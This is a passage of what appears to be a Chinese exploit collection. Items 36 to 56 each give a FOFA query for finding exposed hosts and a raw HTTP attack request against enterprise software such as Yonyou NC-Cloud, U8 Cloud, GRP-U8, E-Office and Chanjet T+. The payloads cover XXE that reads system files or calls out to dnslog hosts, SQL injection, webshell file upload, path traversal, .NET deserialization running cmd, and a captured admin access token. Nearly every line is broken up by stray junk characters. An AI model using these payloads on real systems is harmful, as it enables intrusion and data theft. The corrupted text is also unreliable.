& \5 p7 O; ^( q# g0 B# A% {) Y% v' eHost: 203.25.218.166:8888
3 G. k0 X. m/ V1 z4 B, l UUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
5 D2 J8 w8 o ~: w) w8 BAccept-Encoding: gzip, deflate
/ C3 u7 {/ j& v2 F( FAccept: */*& J6 `/ H3 U0 [; V/ j( T$ \7 o
Connection: close
w3 P8 Q2 r+ U1 b# `/ L9 paccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
2 v: J: k7 C! @% t0 _3 fContent-Length: 190
; }$ K( N! I0 M( U* JContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
$ q2 V8 D: l9 z( Z1 C1 F6 p% K- X3 c: u0 I
--fd28cb44e829ed1c197ec3bc71748df0
0 s; }3 ]' |: h) E: s3 x; YContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
$ _4 m" G2 u$ O4 V7 C9 k. k2 Q
! u B8 w1 e( M) L0 N<%out.println(1111*1111);%>. U; p8 [/ I; m" j2 ~
--fd28cb44e829ed1c197ec3bc71748df0--4 y% i/ m) l$ O( ~: E
3 k! G8 L2 Z, P8 m1 p6 z4 F9 f/ [3 H& v! \8 B4 {7 b {, W
36. 用友NC-Cloud soapFormat XXE
# u8 E6 o; @. d7 H/ A/ Z' u eFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 p1 T& j9 J: N4 A$ C( `" f) ]5 l
POST /uapws/soapFormat.ajax HTTP/1.1
( D) l" @6 V, R. a1 \Host: 192.168.40.130:8989$ A6 s7 j! M: q2 C* |( x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
2 \' W) p' i% F: }4 {8 RContent-Length: 263
& Q" V$ M0 J D4 u0 \( xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 [. t6 O7 P; {! B. }; c; Y8 y* JAccept-Encoding: gzip, deflate
* ], C7 e! d# u+ a' ]: eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
p8 `2 V" y' iConnection: close
/ }0 ?# h: U# x( L" U. gContent-Type: application/x-www-form-urlencoded& g$ X% u1 r f8 M( _0 H7 f! G
Upgrade-Insecure-Requests: 1
. g8 }8 O* A% A. C' ]( N5 K, U4 J% ?; O# y1 Z) {% o4 W
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 `( K2 L3 i2 R; @; _* f0 z( m6 \2 s+ m, J
0 y( l) l- r) c- `. P37. 用友NC-Cloud IUpdateService XXE0 r" {1 A7 [; c! z2 i' f/ N
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"8 f9 m, m" o P" q) k9 B) C, X# N
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 H- I1 e. t0 B" P8 C2 H; h
Host: 192.168.40.130:8989/ D9 o' E: e d5 \- C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.361 T. a' e* e- s: G; u8 w& j* K+ z
Content-Length: 421( @- E; m) P9 {9 D! V4 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) H- A( p8 Z2 F7 m: A& A' g( c
Accept-Encoding: gzip, deflate6 M; s" u6 y) U6 o1 ^6 g
Accept-Language: zh-CN,zh;q=0.9
' M3 z% W9 T2 {1 Y1 @, z4 | DConnection: close
5 W, X7 `% z( |7 i+ H6 w/ d6 QContent-Type: text/xml;charset=UTF-8+ q/ ?. Z: f+ \
SOAPAction: urn:getResult# d9 a- L& k `+ G! _0 ^
Upgrade-Insecure-Requests: 1# t: s" Y" L9 Z' r, V1 _
$ a: J3 z2 r+ k8 C
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
- r, z" F4 C: @; H6 }, s& J3 U K<soapenv:Header/>
& B2 ~; I X5 N/ D+ ~2 k4 n; G<soapenv:Body>' }; I$ {4 T2 T' M
<iup:getResult>! Q- e- d4 }0 y9 Q1 q
<!--type: string-->3 m! N# p/ w" Z
<iup:string><![CDATA[2 e$ j. _" e0 F. U5 w
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>+ r0 n: t, O$ O) k% P
<xxx/>]]></iup:string>
& X; r( V# Z$ z1 V6 Q7 I</iup:getResult>5 Z8 Z u% M( v2 g+ k% v
</soapenv:Body>- d1 y2 l* Z! H& U( ?' e
</soapenv:Envelope>
9 y- F6 s$ l) y) z4 O4 e5 k% R) Y" ~4 P+ D
$ F$ u7 H( X! r+ S0 O
$ F$ C2 ]) p) _0 M* J( d38. 用友U8 Cloud smartweb2.RPC.d XXE0 L% H4 W% `9 m* a# N$ T6 J
FOFA:app="用友-U8-Cloud"
) Y9 P+ [/ e P) b1 V7 DPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
3 W* Z1 n& K! N' c- W$ ]8 @ vHost: 192.168.40.131:80882 d9 o5 @$ m& L- n/ J, {3 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
' J) e, }. R4 f2 dContent-Length: 260/ q+ H. v4 n4 A# e6 D& r1 m2 `, l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% o6 E; r0 V5 }8 C9 a
Accept-Encoding: gzip, deflate
) m) P* G( N8 D5 Y: E2 rAccept-Language: zh-CN,zh;q=0.9% [/ g8 J# e9 D( m' S# c
Connection: close' e4 @ T5 N3 A5 O/ g N' n
Content-Type: application/x-www-form-urlencoded9 h. t5 s) A$ G# D
$ x4 T0 L$ Y4 Q# _) u" ?! F" C__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>% m: [6 W1 V) q+ ~
" M J8 Z( ?+ ?& B3 `, f; Q' V
i4 l# i2 m1 K+ I1 l8 Y4 T39. 用友U8 Cloud RegisterServlet SQL注入
l) {0 s7 S" S' eFOFA:title="u8c"
7 Z1 j$ n1 |4 \; hPOST /servlet/RegisterServlet HTTP/1.1
0 _% W; ^" [7 K, W: k XHost: 192.168.86.128:8089
* A* \- i8 _8 K9 h( V& @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
/ ]$ {# c5 F- w+ c/ p, v* u) JConnection: close- g% m7 v# R$ E! Y4 J6 @1 `9 B; h
Content-Length: 85
6 v- Y! i) j6 ~+ c+ A' J0 YAccept: */*% s% S8 R7 s$ Z6 q' Y0 S
Accept-Language: en
, I% I! J3 y) [( @Content-Type: application/x-www-form-urlencoded
0 Z0 L8 H5 S4 A/ U# o7 z+ UX-Forwarded-For: 127.0.0.1( W4 y9 v. o6 H& T
Accept-Encoding: gzip$ y& h" Q: j& k- m* s( z9 h0 o* c
# ^$ I6 o5 v; e) z4 c: E
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" s% v E6 Y$ G5 N2 }) z; w6 b* F! _
8 B! A$ h$ ?1 t3 p% K [40. 用友U8-Cloud XChangeServlet XXE
0 C+ f; {+ b! E" fFOFA:app="用友-U8-Cloud"' L/ i' ~, [: w/ c. ?' q
POST /service/XChangeServlet HTTP/1.1
7 Y! d j8 `: g8 m" tHost: x.x.x.x
" @5 T9 Y& A0 ]# c- t5 V2 _User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; h$ r& _9 k4 a9 E$ ^- `1 o4 z) C
Content-Type: text/xml, n: B; h$ `+ l
Connection: close
8 ^9 b/ |3 C8 n& R
+ M5 R. U5 O/ H$ F<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>. A; K! F6 m2 M3 p% u. D
4 ?4 W! C$ e* e d: J/ E; `0 h0 s
f% W' G0 T# Y5 A, b8 L c8 N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
) u/ U: C- V) t2 K0 @FOFA:app="用友-U8-Cloud"
" Z7 d( D' |9 h+ w/ k1 L9 MGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
- W7 a' M7 U1 S! W; G" F* ZHost:+ _' _9 ]/ ^0 V7 p4 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. X8 ~4 k) w4 Q2 nContent-Type: application/json$ I9 _: {0 k; _. {5 U
Accept-Encoding: gzip
3 B8 I2 H: h1 a! U5 x3 OConnection: close
T! M# Q: s- [4 A4 ^/ w3 V! |$ K: ?6 D, s0 b# g% C
3 p/ Z6 V" l9 c Q42. 用友GRP-U8 SmartUpload01 文件上传- r3 ^) P& V2 g/ N) P" P* B+ t
FOFA:app="用友-GRP-U8"! x$ ?+ e$ i& B" E- Z- {
POST /u8qx/SmartUpload01.jsp HTTP/1.1
! ]! _: D u# [" o) @) UHost: x.x.x.x
, J8 \ d" r6 R- y, o. FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
' A2 [( x" @; ]) C7 X/ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36- H! `. i- R) ^+ J: Z) X
1 @& @; z5 z( g, k
PAYLOAD
% v9 s& n) K5 L2 Z! F2 A2 e4 A& a! K) D
% I5 U' t& a0 n, ], Q, S, }
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
( ^/ Z) x; G! |& Y) l5 n7 x0 p7 T4 Y% k, C# \9 N5 k
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( E* ?& }' M; ~$ i$ n; R6 {FOFA:app="用友-GRP-U8"
$ O ^* [/ U! S3 F7 h2 b5 U0 gPOST /services/userInfoWeb HTTP/1.1
3 V) k I& R7 b4 P% A0 i: ~1 ?" |Host: your-ip$ m, E) b% P# G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 T% j) N, j) n# }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, _& ^5 Y1 R, L0 ^9 JAccept-Encoding: gzip, deflate5 M. M! l) b- d4 o* x$ S. V7 L
Accept-Language: zh-CN,zh;q=0.9' X1 O' _8 z1 b: t! u6 f
Connection: close) s) {; [8 q0 x
SOAPAction:
" X/ x+ W! z8 a# ]* SContent-Type: text/xml;charset=UTF-8' ^0 E5 r! G, I( D' h$ z
8 ~% P% A+ u! n<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">) s( I$ Z9 J# x: c
<soapenv:Header/>
' c4 z( g9 }8 l+ N# x+ b8 ?( r <soapenv:Body>( H8 p' s8 A6 j6 ^4 s |1 \
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> R( M5 } j8 }% j9 G
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
) r1 }. q- {" F </ser:getUserNameById>
8 t( g* c. u" ^2 V9 p% s3 t </soapenv:Body>9 m* [$ C# Q2 L' P- C2 ]9 F- @6 q
</soapenv:Envelope>
- V( ^, I- K& o% M' s) ]2 i! i+ @7 `2 {
; Q' R; u7 \7 w) o8 C9 \: ?; h44. 用友GRP-U8 bx_dj_check.jsp SQL注入! f& Q+ y+ C9 k7 P* t8 S# w- ?: s
FOFA:app="用友-GRP-U8"- x; e/ a6 f6 K) m7 D- V# l
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
! j! r# }0 `6 eHost: your-ip; D5 v' l3 t( r& w, K4 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.361 v+ a9 h: R* }0 @6 J* V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ s) X5 x/ w2 y) [3 \3 X3 O5 h* _Accept-Encoding: gzip, deflate
( s$ v4 n0 e/ T' oAccept-Language: zh-CN,zh;q=0.97 x- m4 U D6 F7 j2 O* X$ p
Connection: close5 G% X d# H, h' w/ P8 N" z% ^! D
0 H, x# H' c3 H& ^7 m- F t' ^2 [7 L" Q9 V
45. 用友GRP-U8 ufgovbank XXE& y5 j( O# h: j" x4 n3 d
FOFA:app="用友-GRP-U8"
5 j( z5 R0 Q' q5 D MPOST /ufgovbank HTTP/1.1
. X6 ~# p# I& G9 b' \& l" C rHost: 192.168.40.130:222
5 k& e o6 A, p! V. K! }) OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0( ] T ]- l9 _+ {! r4 x2 [$ F$ \
Connection: close) |0 N1 K2 L7 p- R3 j) z& l
Content-Length: 161" T# H0 J+ l) B; I0 _* C( F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! w4 v' y' ?$ N! j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 M3 m' q& \7 W! j3 c/ T5 P5 xContent-Type: application/x-www-form-urlencoded; x, m% f9 B: K# B* ~' H' d+ I) G
Accept-Encoding: gzip
+ S7 G1 c, K, Y2 A% ^9 c \4 }5 h; h% J4 b, \6 J
reqData=<?xml version="1.0"?>
3 c4 b' U9 i$ z<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest! {9 n) w( c" J' I% k
d' M8 c( K8 C/ Z
' d0 f/ j s) L7 I4 e
46. 用友GRP-U8 sqcxIndex.jsp SQL注入( E) i/ t. U3 i: p4 _& v
FOFA:app="用友-GRP-U8"
3 g# l" _/ `( f4 F# _% dGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.12 b0 d, n) Q7 a# K9 S5 w
Host: your-ip
( |6 L) Z/ x3 }9 t6 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
5 Z( y" _5 E& `+ XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# S; R3 ?) Z0 [: c1 lAccept-Encoding: gzip, deflate) O, C$ k2 Q1 X8 ^4 s$ v; H' @+ |" y/ R# H
Accept-Language: zh-CN,zh;q=0.9
$ R# F0 r' f9 ~9 k0 z+ m6 AConnection: close+ O' M- a9 S. p
1 Z( p6 E; C2 ^6 @. B
3 m) t+ t V+ c. X
47. 用友GRP A++Cloud 政府财务云 任意文件读取/ N$ L( T6 K/ w. F. \
FOFA:body="/pf/portal/login/css/fonts/style.css"
3 g( v) p- S7 u" f6 j: ]GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.17 `: m+ u h$ r# [' c! v3 z
Host: x.x.x.x( F: }/ E3 t* s2 _' g$ `7 V
Cache-Control: max-age=0, H9 n( _1 W( j
Upgrade-Insecure-Requests: 1- j; O5 Q' r1 a, s/ ?0 V$ Q1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 x+ @; N. H Z5 V2 @& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Y7 b g6 E) ~4 L9 p3 oAccept-Encoding: gzip, deflate, br
% m. M+ h2 N% iAccept-Language: zh-CN,zh;q=0.9
" k* K N% b; @/ S* K u) r, `If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
3 @+ J0 x- q: |) Y, HConnection: close9 S# `1 v6 c# [
3 W3 F2 e+ }& Y
3 [4 J: i9 a( `: `3 i _# |5 Y+ r1 E- Z0 e, J# ^0 g* \+ ~& v9 k3 Y
48. 用友U8 CRM swfupload 任意文件上传
1 R0 y" }) I5 G$ C: v+ o( BFOFA:title="用友U8CRM"
3 u, ~7 t9 A2 x8 J6 S* H+ I9 dPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1) f$ ]7 U. W8 G E' D: }
Host: your-ip
: o9 R9 L1 |* x- S+ G0 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& x- a7 g( n, B) OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: v1 D8 |/ a$ gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
z* t+ A# R# I) n }Accept-Encoding: gzip, deflate5 B! j5 X! K1 M; A% V& D: R) ~2 p
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
# p* l; x2 p* j( p+ ?9 @0 z------269520967239406871642430066855
' y) i' i4 R# w+ D! OContent-Disposition: form-data; name="file"; filename="s.php"
0 g. c% f% o6 T( ?1231. `! Y9 I, X" k# D
Content-Type: application/octet-stream
2 J5 A! l: h8 V. ]) z9 D6 L' p------269520967239406871642430066855
( p$ V: L4 z9 B/ DContent-Disposition: form-data; name="upload"
& K( S& T5 \2 V# n# bupload
9 m: d" l) H P0 g! i/ Q( \------269520967239406871642430066855--$ p/ c- A$ d8 I; w+ ]3 U4 v$ P
_7 s; k- ?4 g' C, A9 X7 f& d; C& \
( V" T) q, ]1 F O) G49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 h- J& G1 n |6 GFOFA:body="用友U8CRM"! X1 f- {+ Z& h, W2 W; x% z j
9 Z! L- _5 B2 {$ Z6 WPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
) T/ X; J% S2 S& T( ?8 QHost: x.x.x.x. C4 v5 C. e. b8 g0 k( M2 q* E& Z& A! |2 X* [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 L" N! V/ W0 p: }! B% \( U. z
Content-Length: 329/ i/ a$ H R. L* x" q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ `* G# {0 h4 Z$ [' S# x6 XAccept-Encoding: gzip, deflate) P/ {1 T$ Y; Q% [1 f) E1 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! C0 {. F5 Q$ |9 I0 h Z# l
Connection: close
8 l. _$ k( ?( R# NContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w7 Y% e6 q- Y3 ?, \) v
- q7 V" b7 ]& p( Z/ S% |-----------------------------vvv3wdayqv3yppdxvn3w
4 ~" _0 G7 A0 `2 x/ WContent-Disposition: form-data; name="file"; filename="%s.php ", [% Y' L9 `( z# I8 p3 W
Content-Type: application/octet-stream
/ d/ B8 Y# i- I/ F0 D, j. D* q9 {8 V& [& K6 l& [* A
wersqqmlumloqa
$ v4 ^+ t! D( ~- x" Z-----------------------------vvv3wdayqv3yppdxvn3w# r1 U2 b" Z' x8 y
Content-Disposition: form-data; name="upload"
0 }, |! U% Z5 h7 u: A
2 E; A: U! F, e% Gupload
) Q0 l9 f/ H, q+ ^) m) K-----------------------------vvv3wdayqv3yppdxvn3w--: f' G* i5 \4 |
% {+ o6 n7 G1 V+ v, v/ Q
; G& {' P, y v, I& xhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
) K' N* D) _ h: i9 p# s# H# {, }! \+ X" l1 E: s3 i7 e+ P
50. QDocs Smart School 6.4.1 filterRecords SQL注入
% A! m7 L w& X. b! s* z5 H, h/ Q$ t1 WFOFA:body="close closebtnmodal"
& P) U, D( D' j) W6 KPOST /course/filterRecords/ HTTP/1.11 o1 R) O( x% e0 G/ e
Host: x.x.x.x
/ g7 Y1 d$ ?/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* F1 ~5 b# V" }Connection: close4 S' C% { e+ s
Content-Length: 224
0 q% S& B, s- U7 l0 LAccept: */*
, n9 a) `: `4 TAccept-Language: en8 t* c. J7 U0 I2 O( X
Content-Type: application/x-www-form-urlencoded
$ z, Z( c ^( A9 {4 Q- KAccept-Encoding: gzip( Q6 w, _; i' U( U# R$ b8 t
0 V8 ~9 d3 T* T) z5 Rsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=13 u2 E s6 P$ X/ t% F% \
* q! B2 p* o' _1 V
: ~' G: s. N) p51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
( S% U/ U) Q; j+ FFOFA:app="云时空社会化商业ERP系统"
9 T6 p$ p$ \0 v V, ^7 \" C7 CGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
# g/ D" S4 O2 u& h8 u7 X6 nHost: your-ip
' t5 g' s$ J/ V6 W3 }User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36( t. h" p1 j8 ~) k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( V, P' k0 i% N7 ~* N! I5 J, d$ wAccept-Encoding: gzip, deflate
2 n r; E) c: O7 OAccept-Language: zh-CN,zh;q=0.93 M, }* X7 G, h) C8 ?' ?; n3 F
Connection: close
' w5 F% E& \7 e/ Q$ v
/ K& R+ Q, D" J/ z/ F9 h: S4 E1 e( j
52. 泛微E-Office json_common.php sql注入8 N& Y2 i m& a% I$ G6 u
FOFA:app="泛微-EOffice"
& O! E2 j; p9 t; c4 q* K- [9 XPOST /building/json_common.php HTTP/1.12 ^ l$ F4 l9 V7 a. z# \ v) I! z
Host: 192.168.86.128:8097
3 c( n# w8 y# uUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; @9 q; R* a! M- K# w' q0 g; iConnection: close7 m1 w/ o, Q9 v
Content-Length: 87, a; g" A. \. n1 ~# U* D- U
Accept: */*
! O8 j5 p) t3 I5 v* nAccept-Language: en0 }. z% i& ]# M# o
Content-Type: application/x-www-form-urlencoded8 N9 p7 w2 r# P B0 X
Accept-Encoding: gzip- U/ y0 Z% j& j, b$ ?
' m. ]. I7 C2 W$ M1 Y0 H# }
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
3 I; w$ m" B6 b! G5 b1 _3 D
' c: p" }0 t8 [- |* f# X* J* j. o( Q- X l: i
53. 迪普 DPTech VPN Service 任意文件上传
; ^/ ~- e5 r+ v) O' W4 tFOFA:app="DPtech-SSLVPN"- B; S0 w3 Y9 i+ M
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
* u+ B4 Z8 q9 B" P3 S2 f$ ]) ~1 Y7 W3 y K- ~% @2 X
5 g' o0 E4 d }+ C8 \, I. d& e- \" b
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 s$ [% P2 v& ~) R4 F9 Z% x# Q. VFOFA:app="畅捷通-TPlus"
3 ^. r: H) ]' m0 Q第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件3 ~2 U( ?' i" v6 \
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
' [% f. P8 t2 d. P
: m9 C2 n+ B( J) a- s* l
; a4 M, }3 L- R0 P完整数据包
& d/ w! V- W8 C6 cPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" ~! m& X( A3 k1 \Host: x.x.x.x
: K5 }8 B/ Z* b# G/ CUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F! T0 a8 K- h$ @3 I' R6 U* |- m7 y
Content-Length: 593! Z+ ^8 @. J% [4 @% F# C7 A
3 S# |( a6 u& h2 N# W7 {/ f{. s8 b& B4 {9 c& R. j
"storeID":{
+ g) [% v8 c( K "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
$ v6 @7 Z* n; ]9 N "MethodName":"Start",. p) P( c* l |! y( f; v2 q
"ObjectInstance":{
9 Q( e: ^* U; u$ f3 Y. B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 }0 K2 m: z; u "StartInfo":{
9 W N; V, o0 x6 X ?2 O- i "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 O6 q2 C9 t T$ r( U3 z
"FileName":"cmd",. r$ ` I5 A' r, B
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, z# @; U! s0 l& B7 j* N" l }; ]4 s& r1 \! u: I5 _$ I' X
}2 g. I. `) P5 U1 {
}( e' C! Z4 F; T# i5 [
}' O: E" q5 s0 `
, h/ W9 ]& {' |
0 F: a5 P3 {# u9 X: K) S第二步,访问如下url, {6 a( w) c* g8 `; j& z% O" Z3 E
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt& }% z& n0 | Q
+ b5 D* z5 Z j3 n, Q
1 l# S3 \# i. ~7 |+ p9 J" ?55. 畅捷通T+ getdecallusers信息泄露& z+ D; \! t, X1 H4 r0 q
FOFA:app="畅捷通-TPlus"$ e) j0 ?) R8 K4 R2 v# K& L3 p
第一步,通过# g: {+ O8 \: i9 N5 b) D
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie7 W8 b# q2 F; c8 @
第二步,利用获取到的Cookie请求! T$ J: \ W' H- g0 S; ?2 l0 X2 h
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers) ~; y' i1 g) [
! m- u7 U- ]6 m! D+ n6 c56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# o% E }! \+ S% t7 U! i. [+ a6 j
FOFA: app="畅捷通-TPlus"
( U. ~8 M8 B# e' V2 QPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.18 c3 H# e6 W/ X! H, Y
Host: x.x.x.x
